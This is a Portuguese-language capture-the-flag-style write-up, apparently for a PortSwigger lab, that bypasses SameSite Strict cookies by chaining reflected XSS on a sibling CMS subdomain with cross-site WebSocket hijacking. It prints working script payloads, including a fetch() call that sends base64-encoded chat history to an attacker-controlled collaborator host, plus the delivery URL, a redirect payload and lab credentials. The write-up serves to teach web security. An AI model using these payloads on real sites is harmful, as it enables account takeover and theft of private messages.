> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/pt-br/web/csrf/samesite-strict-bypass-via-sibling-domain.md).

# Bypass do SameSite Strict via Domínio Irmão

### Bypass de SameSite Strict via domínio irmão

Laboratório: a funcionalidade de chat ao vivo é vulnerável a sequestro de WebSocket entre sites (CSWSH). O objetivo do laboratório é acessar a conta da vítima extraindo o histórico do chat para o servidor Burp Collaborator padrão; o histórico contém credenciais em texto claro.

Use o servidor de exploração fornecido para lançar um ataque CSWSH que exfiltre o histórico do gato da vítima.

<figure><img src="/files/2b63a1ce808858ec73bcfc58c8bf623ee4fcbb5b" alt=""><figcaption></figcaption></figure>

O chat funciona via WebSocket e o histórico passa por ele.

<figure><img src="/files/fd0493196d3c5170a7802414e6775918ade36129" alt=""><figcaption></figcaption></figure>

O cookie de sessão é enviado com SameSite (bloqueando cenários convencionais de redirecionamento cross-site).

<figure><img src="/files/8ceb227aa1c8645a1991e8c90a192bb13d47d863" alt=""><figcaption></figcaption></figure>

O arquivo cliente do JavaScript (por exemplo, `chat.js`) é carregado de um subdomínio do CMS que retorna um `Access-Control-Allow-Origin` cabeçalho que permite interação a partir desse subdomínio.

<figure><img src="/files/787ecc8b6ec7d5b52c95eca00a8f86ae516c5c7a" alt=""><figcaption></figcaption></figure>

O painel de autenticação do CMS é vulnerável a injeção de script via o `nome de usuário` parâmetro (por exemplo, `?username=<script>alert(0)</script>&password=test`).

<figure><img src="/files/179a0af1fb54de8f7f6455ba8e1558bd617fba46" alt="" width="375"><figcaption></figcaption></figure>

```javascript
<script>alert(0)</script>
```

<figure><img src="/files/d34ea8ffbd25193dfa364483b5051b66f8a657b9" alt=""><figcaption></figcaption></figure>

```
/login?username=<script>alert(0)</script>&password=test
```

<figure><img src="/files/b00ec57d6345edcbe8ead5eafba4560886d617a5" alt=""><figcaption></figcaption></figure>

Usando essa injeção, você pode executar JavaScript no contexto do subdomínio vulnerável, estabelecendo assim um WebSocket autenticado (os cookies são então enviados, já que a origem é a mesma) para o servidor de chat.

### Abordagem (resumo)

1. Coloque um script malicioso no `nome de usuário` parâmetro do formulário de login do subdomínio do CMS.
2. Este script abre uma conexão WebSocket com o servidor de chat e envia um `READY` sinal.

{% code overflow="wrap" %}

```javascript
<script>
  var ws = new WebSocket("https://0a5900a203763a50c2810c7a0074009d.web-security-academy.net/chat");

  ws.onopen = function() {
    ws.send("READY");
  };

  ws.onmessage = function(info) {
    fetch("https://68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com/?data=" + btoa(info.data));
  };
</script>
```

{% endcode %}

3. Ao receber mensagens do WebSocket (histórico do chat), o `fetch` script codifica esses dados (base64) para um servidor controlado pelo atacante (OAST/Oastify).

```bash
/?data=eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9
```

<figure><img src="/files/fb2a5138954af3ca2aaf826ccdef163c7a9bbc24" alt=""><figcaption></figcaption></figure>

Hospede/serve um redirecionamento no servidor de exploração para levar a vítima a visitar a URL vulnerável (login com `nome de usuário` contendo o script).

```bash
echo "eyJ1c2VyIjoiQ09OTkVDVEVEIiwiY29udGVudCI6Ii0tIE5vdyBjaGF0dGluZyB3aXRoIEhhbCBQbGluZSAtLSJ9" | base64 -d
```

#### Resultados observados

* Quando a query exfiltrada foi recebida, o `dados` parâmetro continha uma string64 base; Ao decodificá-la obtemos a entrada do gato.
* Exemplo de payload recebido (decodificado em base64):

```json
{"user":"CONNECTED","content":"-- Now chatting with Hal Pline --"}
```

<figure><img src="/files/768a58cfc6bb6bd9e84401b2eecb454c3351f332" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/e8116dc5969f5967ccf30cbb0aba81848e16fa42" alt=""><figcaption></figcaption></figure>

Ao injetar a partir do contexto autenticado (subdomínio do CMS), o script transmitiu mensagens contendo conversas do usuário e, neste caso, uma mensagem contendo as credenciais em texto claro.

{% code overflow="wrap" %}

```
https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef
```

{% endcode %}

{% code overflow="wrap" %}

```javascript
<script>
  location="https://cms-0a5900a203763a50c2810c7a0074009d.web-security-academy.net/login?username=%3Cscript%3E+++var+ws+%3D+new+WebSocket%28%22https%3A%2F%2F0a5900a203763a50c2810c7a0074009d.web-security-academy.net%2Fchat%22%29%3B++++ws.onopen+%3D+function%28%29+%7B+++++ws.send%28%22READY%22%29%3B+++%7D%3B++++ws.onmessage+%3D+function%28info%29+%7B+++++fetch%28%22https%3A%2F%2F68cxlq1fllh96z60yqiw496jiao4cu0j.oastify.com%2F%3Fdata%3D%22+%2B+btoa%28info.data%29%29%3B+++%7D%3B+%3C%2Fscript%3E&password=ef";
</script>
```

{% endcode %}

#### Credenciais extraídas (conforme observado)

* `carlos:hdf3fkk8h7tnltupqs5t` (credenciais encontradas no histórico do chat)

{% code overflow="wrap" %}

```json
{"user":"Hal Pline","content":"No problem carlos, it's hdf3fkk8h7tnltupqs5t"}
```

{% endcode %}

<figure><img src="/files/eb3ef005632c7f3462954783b1004e9372a12a2b" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/pt-br/web/csrf/samesite-strict-bypass-via-sibling-domain.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
